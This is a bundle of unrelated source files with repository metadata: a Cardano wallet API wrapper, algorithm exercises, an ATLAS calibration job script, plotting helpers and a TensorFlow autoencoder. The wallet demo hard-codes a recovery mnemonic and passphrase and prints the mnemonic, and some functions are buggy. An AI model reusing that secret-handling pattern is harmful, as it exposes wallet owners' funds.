return "byron-wallets"
else:
raise ValueError(
f"{bcolors.FAIL}Empty or incorrect wallet type.{bcolors.ENDC}"
)
def network_information(self):
print("*** Get network information. ***")
r = requests.get(f"{self.server}/{self.version}/network/information")
print(r.status_code)
if r.status_code == 404:
raise ConnectionError(
f"{bcolors.WARNING}Please check your server URL in the config.{bcolors.ENDC}"
)
return r.json()
def create_wallet(self, wallet_type, name, passphrase, mnemonic, style="random"):
wallets = self.make_wallet_path(wallet_type)
print("*** Create Wallet. ***")
endpoint = f"{self.server}/{self.version}/{wallets}/"
r = requests.post(
endpoint,
json={
"style": style,
"name": name,
"passphrase": passphrase,
"mnemonic_sentence": mnemonic,
},
headers=self.headers,
)
print(json.dumps(mnemonic))
return r.json()
def create_address(self, wallet_type, wallet_id, passphrase, address_index=0):
wallets = self.make_wallet_path(wallet_type)
if wallet_type == "shelley":
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/addresses"
r = requests.post(
endpoint,
json={
"payment": {
"any": [
"addr_shared_vkh1zxt0uvrza94h3hv4jpv0ttddgnwkvdgeyq8jf9w30mcs6y8w3nq",
]
},
},
headers=self.headers,
)
else:
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/addresses"
r = requests.post(
endpoint,
json={
"passphrase": passphrase,
"address_index": address_index,
},
headers=self.headers,
)
return r.json()
def create_transaction(
self, wallet_type, wallet_id, to_address, quantity, assets=None
):
wallets = self.make_wallet_path(wallet_type)
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/payment-fees"
print(endpoint)
payload = {
"payments": [
{
"address": to_address,
"amount": {"quantity": quantity, "unit": "lovelace"},
}
]
}
if assets:
policy_id = assets["policy_id"]
asset_name = assets["asset_name"]
quantity = assets["quantity"]
            assets = [
                {
                    "policy_id": policy_id,
                    "asset_name": asset_name,
                    "quantity": quantity,
                }
            ]
payload["payments"][0]["assets"] = assets
r = requests.post(
endpoint,
json=payload,
headers=self.headers,
)
return r.json()
def delete_wallet(self, wallet_type, wallet_id):
wallets = self.make_wallet_path(wallet_type)
print("*** Deleting Wallet. ***")
r = requests.delete(
f"{self.server}/{self.version}/{wallets}/{wallet_id}",
)
print(f"*** Wallet {wallet_id} deleted. ***")
return True
def inspect_wallet(self, wallet_type, wallet_id, start=None, stop=None):
wallets = self.make_wallet_path(wallet_type)
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}"
print(endpoint)
r = requests.get(endpoint)
print("HERE")
print(r.json())
return r.json()
def inspect_address(self, address):
endpoint = f"{self.server}/{self.version}/addresses/{address}"
print(endpoint)
r = requests.get(endpoint)
return r.json()
def list_wallets(self, wallet_type):
wallets = self.make_wallet_path(wallet_type)
print("*** List Wallet Information. ***")
endpoint = f"{self.server}/{self.version}/{wallets}"
print(endpoint)
r = requests.get(endpoint)
return r.json()
def list_utxo(self, wallet_id):
print("*** Get UTxO Statistics. ***")
endpoint = f"{self.server}/{self.version}/{wallet_id}/statistics/utxos"
r = requests.get(endpoint)
return r.json()
def list_addresses(self, wallet_type, wallet_id):
wallets = self.make_wallet_path(wallet_type)
print("*** List addresses. ***")
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/addresses"
r = requests.get(endpoint)
return r.json()
def list_transactions(self, wallet_type, wallet_id, start=None, end=None):
wallets = self.make_wallet_path(wallet_type)
r = requests.get(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/transactions"
)
return r.json()
def list_stakepools(self):
print("*** List stakepools. ***")
r = requests.get(f"{self.server}/{self.version}/stake-pools")
return r.json()
def join_stakepool(self, stake_pool_id, wallet_id, passphrase):
        endpoint = (
            f"{self.server}/{self.version}/stake-pools/{stake_pool_id}/wallets/{wallet_id}"
        )
r = requests.put(
endpoint,
json={
"passphrase": passphrase,
},
headers=self.headers,
)
return r.json()
def join_stakepools(self, wallet_id, passphrase):
endpoint = f"{self.server}/{self.version}/stake-pools/*/wallets/{walletId}"
r = requests.get(
endpoint,
json={
"passphrase": passphrase,
},
headers=self.headers,
)
return r.json()
def is_sync_ready(self):
progress = self.network_information()["sync_progress"]["status"]
print(progress)
return progress == "ready"
def smash_health(self):
r = requests.get(f"{self.server}/{self.version}/smash/health")
return r.json()
def network_clock(self):
print("*** Get network clock. ***")
r = requests.get(f"{self.server}/{self.version}/network/clock")
return r.json()
def network_parameters(self):
r = requests.get(f"{self.server}/{self.version}/network/parameters")
return r.json()
def settings(self):
r = requests.get(f"{self.server}/{self.version}/settings")
return r.json()
def utxo_statistics(self, wallet_id):
print("*** Get UTxO Statistics. ***")
r = requests.get(f"{self.server}/{self.version}/{wallet_id}/statistics/utxos")
return r.json()
def update_wallet_name(self, wallets, wallet_id, name):
print("*** Update wallet name. ***")
r = requests.put(
f"{self.server}/{self.version}/{wallets}/{wallet_id}",
json={
"name": name,
},
)
return r.json()
def update_wallet_passphrase(
self, wallets, wallet_id, old_passphrase, new_passphrase
):
print("*** Update wallet passphrase. ***")
r = requests.put(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/passphrase",
json={
"old_passphrase": old_passphrase,
"new_passphrase": new_passphrase,
},
)
return r.json()
def list_wallet_assets(self, wallets, wallet_id):
print("*** List assets. ***")
r = requests.get(f"{self.server}/{self.version}/{wallets}/{wallet_id}/assets")
return r.json()
    def maintenance_actions(self, wallet_id):
print("*** List maintenance actions. ***")
r = requests.get(
f"{self.server}/{self.version}/stake-pools/maintenance-actions"
)
return r.json()
def delegation_fees(self, wallets, wallet_id):
print("*** List delegation fees. ***")
r = requests.get(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/delegation-fees"
)
return r.json()
def coin_selections(self, wallets, wallet_id):
print("*** Select coins to cover the given set of payments. ***")
r = requests.post(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/coin-selections/random"
)
print(r.json())
def shared_wallets(self, wallets, wallet_id):
print("*** Get share wallets. ***")
r = requests.get(f"{self.server}/{self.version}/shared-wallets/{wallet_id}/")
print(r.json())
if __name__ == "__main__":
wallet = WalletWrap()
print(wallet.network_information())
print(wallet.is_sync_ready())
    print(wallet.list_wallets("byron"))
name = "Test Wallet May 6 2021"
passphrase = "Very important!!!"
# mnemonic = AddressWrapper.get_mnemonic(12)
mnemonic = [
"squirrel",
"material",
"silly",
"twice",
"direct",
"slush",
"pistol",
"razor",
"become",
"junk",
"kingdom",
"flee",
]
    created = wallet.create_wallet("byron", name, passphrase, mnemonic)
    print("Should be created...")
    # the new wallet's id is returned in the creation response ("id" field)
    print(wallet.list_addresses("byron", created["id"]))
    print(wallet.list_wallets("byron"))
|
[
"vishal.h.lall@gmail.com"
] |
vishal.h.lall@gmail.com
|
d2efcc764e27da871a5ee47f86deb93305ffb268
|
4ac0636ef316ed10e4f5286d4311969f28a93adf
|
/ntech.py
|
79504af7a61e2b464ca394e26d0c2f3cbec415a7
|
[] |
no_license
|
smothly/algorithm-solving
|
9afad7bb6bf9c7117c0c9fecba5a827ec5e7d927
|
7a72f091a2de1e6af44343ffff79ab11a7a3bac9
|
refs/heads/master
| 2022-12-23T12:24:14.837968
| 2020-10-03T14:52:42
| 2020-10-03T14:52:42
| 263,236,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
def solution(flowers):
answer = 0
# sort
flowers.sort(key=lambda x:(x[0], x[1]))
new_days = []
    # merge overlapping date ranges (pairwise only; see the sketch below)
for i in range(len(flowers)-1):
if flowers[i][1] >= flowers[i+1][0]:
new_days.append((flowers[i][0], flowers[i+1][1]))
else:
new_days.append((flowers[i][0], flowers[i][1]))
print(new_days)
    return sum(x[1] - x[0] for x in new_days)
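# Note: the pairwise merge above does not collapse chains of three or more
# overlapping ranges. A minimal sketch of a standard interval merge, assuming
# each flower is a (start, end) pair (helper name illustrative):
def merge_intervals(intervals):
    merged = []
    for start, end in sorted(intervals):
        if merged and start <= merged[-1][1]:
            # overlaps the last merged range: extend its end
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    return merged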
def solution(histogram):
start, end = 0, len(histogram) - 1
answer = 0
while True:
print(start, end)
if histogram[end-1] > histogram[end]:
end -= 1
elif histogram[start+1] > histogram[start]:
start += 1
else:
answer = (end - start - 1) * min([histogram[start], histogram[end]])
break
return answer
def solution(N):
answer = 0
if N <= 2:
return N
dp = [1, 2]
for i in range(2, N):
dp.append(2 * dp[i-1] + i -1)
print(dp)
return dp[-1]
solution(6)
|
[
"seungho546@naver.com"
] |
seungho546@naver.com
|
6af689639ddfcb358242510a287fa6c89aca2e3a
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/LArCalorimeter/LArCalibTools/share/LArMCConditions2Ntuple.py
|
1a35ffa4835cfb273b6320e18243c2bfdc57f847
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949
| 2020-01-19T03:59:35
| 2020-01-19T03:59:35
| 234,836,993
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,483
|
py
|
import AthenaCommon.AtlasUnixGeneratorJob #use MC event selector
from string import split,join
## get a handle to the default top-level algorithm sequence
from AthenaCommon.AlgSequence import AlgSequence
topSequence = AlgSequence()
#Input Parameters:
# PoolFiles: sequence of pool files to read from though CondProxyProvider
# if not given, read from COOL
#
# RunNumber: Input to COOL IOV-DB if reading from
#
# RootFile: root file for the ntuple
#
# Objects: List of objects written to ntuple (PEDESTAL OFC, RAMP,
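# Example invocation (illustrative values), overriding parameters with athena's -c option:
#   athena.py -c "RunNumber=1234; RootFile='myconds.root'; Objects=['PEDESTAL','RAMP']" LArCalibTools/LArMCConditions2Ntuple.py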
DBTag='OFLCOND-SDR-BS14T-IBL-06'
if not 'InputDB' in dir():
InputDB="COOLOFL_LAR/OFLP200"
if not "OFCFolder" in dir():
OFCFolder="5samples1phase"
if not 'RunNumber' in dir():
RunNumber=2147483647
if not "RootFile" in dir():
RootFile="LArConditions.root"
if not "Objects" in dir():
Objects=["PEDESTAL","RAMP","OFC","MPHYSOVERMCAL","SHAPE","UA2MEV"]
if not "DBTag" in dir():
DBTag="LARCALIB-000-01"
def doObj(objName):
for o in Objects:
if o.upper().find(objName.upper())!=-1:
return True
return False
def getDBFolderAndTag(folder):
if "TagSuffix" in dir():
tag="<tag>"+join(split(folder, '/'),'') + TagSuffix+"</tag>"
else:
tag=""
return "<db>"+InputDB+"</db>"+folder+tag
from AthenaCommon.GlobalFlags import globalflags
globalflags.DataSource="geant4"
globalflags.InputFormat="pool"
from AthenaCommon.JobProperties import jobproperties
jobproperties.Global.DetDescrVersion = "ATLAS-GEO-18-01-03"
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOff()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
#Set up GeoModel (not really needed but crashes without)
from AtlasGeoModel import SetGeometryVersion
from AtlasGeoModel import GeoModelInit
#Get identifier mapping (needed by LArConditionsContainer)
svcMgr.IOVDbSvc.GlobalTag=DBTag
include( "LArConditionsCommon/LArIdMap_comm_jobOptions.py" )
theApp.EvtMax = 1
svcMgr.EventSelector.RunNumber = RunNumber
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/BadChannels<key>/LAR/BadChannels/BadChannels</key>")
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/MissingFEBs<key>/LAR/BadChannels/MissingFEBs</key>")
conddb.addOverride('/LAR/Identifier/FebRodAtlas','FebRodAtlas-005')
conddb.addOverride('/LAR/Identifier/OnOffIdAtlas','OnOffIdAtlas-012')
if 'PoolFiles' in dir():
from AthenaCommon.ConfigurableDb import getConfigurable
from AthenaCommon.AppMgr import ServiceMgr
ServiceMgr.ProxyProviderSvc.ProviderNames += [ "CondProxyProvider" ]
ServiceMgr += getConfigurable( "CondProxyProvider" )()
svcMgr.CondProxyProvider.InputCollections=PoolFiles
if 'PoolCat' in dir():
svcMgr.PoolSvc.ReadCatalog+=["xmlcatalog_file:"+PoolCat]
loadCastorCat=False
if doObj("PEDESTAL"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Pedestal"))
from LArCalibTools.LArCalibToolsConf import LArPedestals2Ntuple
LArPedestals2Ntuple=LArPedestals2Ntuple("LArPedestals2Ntuple")
LArPedestals2Ntuple.AddFEBTempInfo=False
topSequence+=LArPedestals2Ntuple
if doObj("AUTOCORR"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibOfl/AutoCorrs/AutoCorr"))
from LArCalibTools.LArCalibToolsConf import LArAutoCorr2Ntuple
LArAutoCorr2Ntuple=LArAutoCorr2Ntuple("LArAutoCorr2Ntuple")
LArAutoCorr2Ntuple.AddFEBTempInfo=False
topSequence+=LArAutoCorr2Ntuple
if doObj("OFC"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/HVScaleCorr"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Noise"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/AutoCorr"))
from LArRecUtils.LArADC2MeVToolDefault import LArADC2MeVToolDefault
from LArRecUtils.LArAutoCorrNoiseToolDefault import LArAutoCorrNoiseToolDefault
theLArADC2MeVToolDefault = LArADC2MeVToolDefault()
ToolSvc += theLArADC2MeVToolDefault
theLArAutoCorrNoiseToolDefault = LArAutoCorrNoiseToolDefault()
theLArAutoCorrNoiseToolDefault.NSamples = 5
ToolSvc += theLArAutoCorrNoiseToolDefault
from LArRecUtils.LArOFCToolDefault import LArOFCToolDefault
theOFCTool = LArOFCToolDefault()
theOFCTool.Dump=True
ToolSvc += theOFCTool
from LArCalibTools.LArCalibToolsConf import LArOFC2Ntuple
LArOFC2Ntuple = LArOFC2Ntuple("LArOFC2Ntuple")
LArOFC2Ntuple.ContainerKey = "LArOFC"
LArOFC2Ntuple.AddFEBTempInfo=False
LArOFC2Ntuple.IsMC = True
LArOFC2Ntuple.OFCTool = theOFCTool
topSequence+=LArOFC2Ntuple
if (doObj("SHAPE")):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Shape"))
from LArCalibTools.LArCalibToolsConf import LArShape2Ntuple
LArShape2Ntuple = LArShape2Ntuple("LArShape2Ntuple")
LArShape2Ntuple.ContainerKey = "LArShape"
LArShape2Ntuple.AddFEBTempInfo=False
LArShape2Ntuple.IsMC = True
topSequence+=LArShape2Ntuple
if doObj("RAMP"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Ramp"))
from LArCalibTools.LArCalibToolsConf import LArRamps2Ntuple
LArRamps2Ntuple=LArRamps2Ntuple("LArRamps2Ntuple")
LArRamps2Ntuple.NtupleName = "RAMPS"
LArRamps2Ntuple.RawRamp = False
LArRamps2Ntuple.IsMC = True
LArRamps2Ntuple.AddFEBTempInfo=False
topSequence+=LArRamps2Ntuple
if (doObj("UA2MEV")):
print 'DAC2uA check : ',getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA")
print 'uA2MeV check : ',getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV")
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV"))
from LArCalibTools.LArCalibToolsConf import LAruA2MeV2Ntuple
LAruA2MeV2Ntuple=LAruA2MeV2Ntuple("LAruA2MeV2Ntuple")
LAruA2MeV2Ntuple.AddFEBTempInfo=False
topSequence+=LAruA2MeV2Ntuple
if (doObj("MPHYSOVERMCAL")):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/MphysOverMcal"))
from LArCalibTools.LArCalibToolsConf import LArMphysOverMcal2Ntuple
LArMphysOverMcal2Ntuple=LArMphysOverMcal2Ntuple("LArMphysOverMcal2Ntuple")
LArMphysOverMcal2Ntuple.AddFEBTempInfo=False
LArMphysOverMcal2Ntuple.IsMC=True
topSequence+=LArMphysOverMcal2Ntuple
if loadCastorCat:
svcMgr.PoolSvc.ReadCatalog += ['xmlcatalog_file:'+'/afs/cern.ch/atlas/conditions/poolcond/catalogue/poolcond/PoolCat_comcond_castor.xml']
theApp.HistogramPersistency = "ROOT"
from GaudiSvc.GaudiSvcConf import NTupleSvc
svcMgr += NTupleSvc()
svcMgr.NTupleSvc.Output = [ "FILE1 DATAFILE='"+RootFile+"' OPT='NEW'" ]
svcMgr.MessageSvc.OutputLevel = DEBUG
svcMgr.IOVDbSvc.DBInstance="OFLP200"
|
[
"rushioda@lxplus754.cern.ch"
] |
rushioda@lxplus754.cern.ch
|
ff99c5b38da07f2441b44b40a4551a011355c801
|
df100f181d9564bc3641dfec45726ac1cc1b2325
|
/剑指offer/33.第一个只出现一次的字符/code2.py
|
53b3b23a1aa9e81810711f85bca9b99e7fa8d470
|
[] |
no_license
|
forthlsss/codeForInterview
|
83efe7d5e0e9f150abae2d84f50829d99034dae1
|
10791dfc3c34f0a236a386fe9a91f46d725bded5
|
refs/heads/master
| 2020-12-03T12:32:51.071062
| 2020-01-14T06:49:48
| 2020-01-14T06:49:48
| 231,318,350
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
py
|
def FirstNotRepeatingChar(s):
# write code here
map = {}
for i in range(len(s)):
map[s[i]] = map.get(s[i], 0) + 1
for i in range(len(s)):
if map[s[i]] == 1:
return i
return -1
print(FirstNotRepeatingChar('abac'))
|
[
"noreply@github.com"
] |
noreply@github.com
|
e1ba67a60183bb2601c60345b23bedce84b2c2b2
|
b13df72a0259b298a47b7c98d8c183789eea02d6
|
/pacpac/parapred/plotting.py
|
ed89623074a96810a96708a16f416ae507e7a66d
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
aretasg/pacpac
|
c7f679e34f2c4a8b11f5d16669db052a6f73efd2
|
3d0e2beb82a55e4632270d9578e93a096c9f0ecf
|
refs/heads/main
| 2023-04-19T06:06:18.190562
| 2022-04-23T00:00:53
| 2022-04-23T00:00:53
| 333,276,229
| 6
| 3
|
BSD-3-Clause
| 2021-07-27T12:12:14
| 2021-01-27T02:13:06
|
Python
|
UTF-8
|
Python
| false
| false
| 5,256
|
py
|
from sklearn import metrics
import numpy as np
import matplotlib.pyplot as plt
def plot_stats(history, plot_filename="stats.pdf"):
plt.figure()
plt.rc("text", usetex=True)
plt.rc("font", family="sans-serif")
plt.title("Metrics vs number of epochs")
plt.subplot(3, 1, 1)
plt.plot(history.history["loss"])
plt.plot(history.history["val_loss"])
plt.ylabel("Loss")
plt.xlabel("Epoch")
plt.legend(["Training set", "Validation set"], loc="upper left")
plt.subplot(3, 1, 2)
plt.plot(history.history["false_pos"])
plt.plot(history.history["val_false_pos"])
plt.ylabel("False positive rate")
plt.xlabel("Epoch")
plt.legend(["Training set", "Validation set"], loc="upper left")
plt.subplot(3, 1, 3)
plt.plot(history.history["false_neg"])
plt.plot(history.history["val_false_neg"])
plt.ylabel("False negative rate")
plt.xlabel("Epoch")
plt.legend(["Training set", "Validation set"], loc="upper left")
plt.savefig(plot_filename)
def plot_pr_curve(
labels_test,
probs_test,
colours=("#0072CF", "#68ACE5"),
label="This method",
plot_fig=None,
):
if plot_fig is None:
plot_fig = plt.figure(figsize=(4.5, 3.5), dpi=300)
ax = plot_fig.gca()
num_runs = len(labels_test)
precs = np.zeros((num_runs, 10000))
recalls = np.linspace(0.0, 1.0, num=10000)
for i in range(num_runs):
l = labels_test[i]
p = probs_test[i]
prec, rec, _ = metrics.precision_recall_curve(l.flatten(), p.flatten())
        # Maximum interpolation: make the precision curve monotone non-increasing in recall
for j in range(len(prec)):
prec[j] = prec[: (j + 1)].max()
prec = list(reversed(prec))
rec = list(reversed(rec))
for j, recall in enumerate(recalls): # Inefficient, but good enough
for p, r in zip(prec, rec):
if r >= recall:
precs[i, j] = p
break
avg_prec = np.average(precs, axis=0)
err_prec = np.std(precs, axis=0)
ax.plot(recalls, avg_prec, c=colours[0], label=label)
btm_err = avg_prec - 2 * err_prec
btm_err[btm_err < 0.0] = 0.0
top_err = avg_prec + 2 * err_prec
top_err[top_err > 1.0] = 1.0
ax.fill_between(recalls, btm_err, top_err, facecolor=colours[1])
ax.set_ylabel("Precision")
ax.set_xlabel("Recall")
ax.legend()
print("Average precision: {}".format(np.mean(avg_prec)))
return plot_fig
def plot_abip_pr(plot_fig=None):
if plot_fig is None:
plot_fig = plt.figure(figsize=(4.5, 3.5), dpi=300)
ax = plot_fig.gca()
abip_rec = np.array([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.92])
abip_pre = np.array([0.77, 0.74, 0.66, 0.61, 0.56, 0.51, 0.50, 0.48, 0.44, 0.415])
abip_std = np.array(
[0.06, 0.04, 0.031, 0.028, 0.026, 0.023, 0.02, 0.015, 0.013, 0.012]
)
ax.errorbar(
abip_rec,
abip_pre,
yerr=2 * abip_std,
label="Antibody i-Patch (ABiP)",
fmt="o",
mfc="#EA7125",
mec="#EA7125",
ms=3,
ecolor="#F3BD48",
elinewidth=1,
capsize=3,
)
ax.set_ylabel("Precision")
ax.set_xlabel("Recall")
ax.legend()
return plot_fig
def plot_roc_curve(
labels_test,
probs_test,
colours=("#0072CF", "#68ACE5"),
label="This method",
plot_fig=None,
):
if plot_fig is None:
plot_fig = plt.figure(figsize=(3.7, 3.7), dpi=400)
ax = plot_fig.gca()
num_runs = len(labels_test)
tprs = np.zeros((num_runs, 10000))
fprs = np.linspace(0.0, 1.0, num=10000)
for i in range(num_runs):
l = labels_test[i]
p = probs_test[i]
fpr, tpr, _ = metrics.roc_curve(l.flatten(), p.flatten())
for j, fpr_val in enumerate(fprs): # Inefficient, but good enough
for t, f in zip(tpr, fpr):
if f >= fpr_val:
tprs[i, j] = t
break
avg_tpr = np.average(tprs, axis=0)
err_tpr = np.std(tprs, axis=0)
ax.plot(fprs, avg_tpr, c=colours[0], label=label)
btm_err = avg_tpr - 2 * err_tpr
btm_err[btm_err < 0.0] = 0.0
top_err = avg_tpr + 2 * err_tpr
top_err[top_err > 1.0] = 1.0
ax.fill_between(fprs, btm_err, top_err, facecolor=colours[1])
ax.set_ylabel("True positive rate")
ax.set_xlabel("False positive rate")
ax.legend()
return plot_fig
def plot_binding_profiles(
contact, parapred, colours=("#0072CF", "#D6083B"), save_as="binding_profiles.eps"
):
plt.rcParams["font.family"] = "Arial"
plot_fig = plt.figure(figsize=(4.8, 3.7), dpi=400)
ax = plot_fig.gca()
# Is order in contact and parapred values always the same?
ind = np.arange(len(contact.keys()))
width = 0.35
ax.bar(
ind, np.array(list(contact.values())), width, color=colours[0], label="Contact"
)
ax.bar(
ind + width,
np.array(list(parapred.values())),
width,
color=colours[1],
label="Model's predictions",
)
ax.set_ylabel("Relative binding frequency")
ax.set_title("Residue type binding profile")
ax.set_xticks(ind + width / 2)
ax.set_xticklabels(contact.keys())
plt.legend()
plt.savefig(save_as)
|
[
"gasp@Aretass-MacBook-Pro.local"
] |
gasp@Aretass-MacBook-Pro.local
|
66a4c5f13e1dc79c7ef110ee7f36ab90411658d1
|
3a6cf9261ca5e58468622f49cfa109d65f7b4eda
|
/src/python/spikes/stereo.py
|
3bfe579ce6e4881dbb41e9f01fcc2026dd9dddab
|
[] |
no_license
|
romilly/cluster-hat
|
a6784f85da5287466a73ef61a0111063bcd171b1
|
a872da5bfa6ab2cb666095ab6845bafa5d4badca
|
refs/heads/master
| 2021-05-09T13:30:34.743067
| 2018-01-30T15:11:35
| 2018-01-30T15:11:35
| 119,036,856
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
imgL = cv2.imread('images/p1-image1.jpg',0)
imgR = cv2.imread('images/p2-image1.jpg',0)
stereo = cv2.StereoBM_create(numDisparities=16, blockSize=15)
disparity = stereo.compute(imgL,imgR)
plt.imshow(disparity,'gray')
plt.show()
|
[
"romilly.cocking@gmail.com"
] |
romilly.cocking@gmail.com
|
335a917f993a2444982d969d5168c22b7ae98d6d
|
6d5fd2e7b9a66e17593a490a80e96e95d36436a3
|
/src/profiles/signals.py
|
81924a9d88eb4f0810a55822910c9384d971ed0a
|
[] |
no_license
|
Husain-Jinia/Django-Report-Generator
|
f38276b47c263824b2f6794d793ff63872ba31fc
|
277a06584e7d333d9380f213abc217e29ecafd17
|
refs/heads/master
| 2023-04-20T06:05:13.294836
| 2021-05-15T08:01:11
| 2021-05-15T08:01:11
| 365,412,503
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
from .models import Profile
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
@receiver(post_save, sender=User)
def post_save_create_profile(sender, instance, created, **kwargs):
print(sender)
print(instance)
print(created)
if created:
Profile.objects.create(user=instance)
|
[
"husainjinia0201@gmail.com"
] |
husainjinia0201@gmail.com
|
a18d18d5499fe363256254b60eafa134abbde7af
|
91af92779be5fa5cea94a835543173d0c907b1e5
|
/Lab4/src/flnn_one_channel_with_autoencoder.py
|
60f603a1a7c43f9cd35d95f790f94f61e4bd0b49
|
[] |
no_license
|
mabean/DeepLearning
|
fe9579683804a7b86d82256528cc3ad2899abe7a
|
9438d5aeb5c6ba7f24a7cb0e6b3afb253e43f93f
|
refs/heads/master
| 2021-09-01T08:00:14.231043
| 2017-12-25T22:06:56
| 2017-12-25T22:06:56
| 109,853,089
| 0
| 1
| null | 2017-12-25T22:06:57
| 2017-11-07T15:22:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,831
|
py
|
import sys
sys.path.append('../../data/')
import tfrecords_reader as reader
from tfrecords_converter import rgb_to_y
import tensorflow as tf
import numpy as np
batch_size = 30
test_batch_size = 30
batches_count = 1000
tests_count = 100
features_size = 256 * 256
hidden_layer1_size = 1000
hidden_layer2_size = 300
classes_size = 3
learning_rate = 0.01
num_steps = 1000
display_step = 500
filename_train_queue = tf.train.string_input_producer(["../../data/dataset_train.tfrecords"])
filename_test_queue = tf.train.string_input_producer(["../../data/dataset_test.tfrecords"])
train_images, train_labels = reader.read(filename_train_queue)
x_tensor, y_tensor = reader.next_batch3d(train_images, train_labels, batch_size)
test_images, test_labels = reader.read(filename_test_queue)
x_test_Tensor, y_test_Tensor = reader.next_batch3d(test_images, test_labels, test_batch_size)
# Input batches have shape (count_of_images, height, width, RGB)
x = tf.placeholder(tf.float32, [None, features_size])
y = tf.placeholder(tf.float32, [None, classes_size])
W1_encoder = tf.get_variable('W1_encoder', [features_size, hidden_layer1_size], initializer=tf.random_normal_initializer())
W2_encoder = tf.get_variable('W2_encoder', [hidden_layer1_size, hidden_layer2_size], initializer=tf.random_normal_initializer())
W1_decoder = tf.get_variable('W1_decoder', [hidden_layer2_size, hidden_layer1_size], initializer=tf.random_normal_initializer())
W2_decoder = tf.get_variable('W2_decoder', [hidden_layer1_size, features_size], initializer=tf.random_normal_initializer())
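# Fully connected autoencoder: 256*256 inputs -> 1000 -> 300 (code) -> 1000 -> 256*256 outputs.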
def encoder(X):
b1_encoder = tf.get_variable('b1_encoder', [1,], initializer=tf.constant_initializer(0.0))
y1 = tf.nn.relu(tf.matmul(X, W1_encoder) + b1_encoder)
b2_encoder = tf.get_variable('b2_encoder', [1,], initializer=tf.constant_initializer(0.0))
y2 = tf.nn.relu(tf.matmul(y1, W2_encoder) + b2_encoder)
    return y2
def decoder(X_):
b1_decoder = tf.get_variable('b1_decoder', [1,], initializer=tf.constant_initializer(0.0))
y3 = tf.nn.relu(tf.matmul(X_, W1_decoder) + b1_decoder)
b2_decoder = tf.get_variable('b2_decoder', [1,], initializer=tf.constant_initializer(0.0))
y4 = tf.nn.relu(tf.matmul(y3, W2_decoder) + b2_decoder)
    return y4
encoder_op = encoder(x)
decoder_op = decoder(encoder_op)
y_pred = decoder_op
y_true = x
loss = tf.reduce_mean(tf.pow(y_true - y_pred, 2))
optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(loss)
W3 = tf.get_variable('W3', [hidden_layer2_size, classes_size], initializer=tf.random_normal_initializer())
b3 = tf.get_variable('b3', [1,], initializer=tf.constant_initializer(0.0))
y_ = tf.nn.softmax(tf.matmul(encoder_op, W3) + b3)
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y * tf.log(y_),
reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(learning_rate=0.5).minimize(cross_entropy)
init_op = tf.global_variables_initializer()
# Train
with tf.Session() as sess:
sess.run (init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
print ("Autoencoder...")
for i in range(1, num_steps+1):
print (100 * i/num_steps,'%\r', end ='')
# Prepare Data
batch_x, _ = sess.run ([x_tensor, y_tensor])
x_2d_a = rgb_to_y(batch_x[:,:,:,0], batch_x[:,:,:,1], batch_x[:,:,:,2])
x_b_a = x_2d_a.reshape(batch_size, -1) / 255
# Run optimization op (backprop) and cost op (to get loss value)
_, l = sess.run([optimizer, loss], feed_dict={x: x_b_a})
# Display logs per step
if i % display_step == 0 or i == 1:
print('Step %i: Minibatch Loss: %f' % (i, l))
for _ in range(batches_count):
print (100 * _/batches_count,'%\r', end ='')
x_2d3c, y_b = sess.run ([x_tensor, y_tensor])
x_2d = rgb_to_y(x_2d3c[:,:,:,0], x_2d3c[:,:,:,1], x_2d3c[:,:,:,2])
x_b = x_2d.reshape(batch_size, -1) / 255
vec_y = np.zeros([batch_size, 3])
vec_y[range(batch_size), y_b] = 1
sess.run(train_step, feed_dict={ x: x_b, y: vec_y })
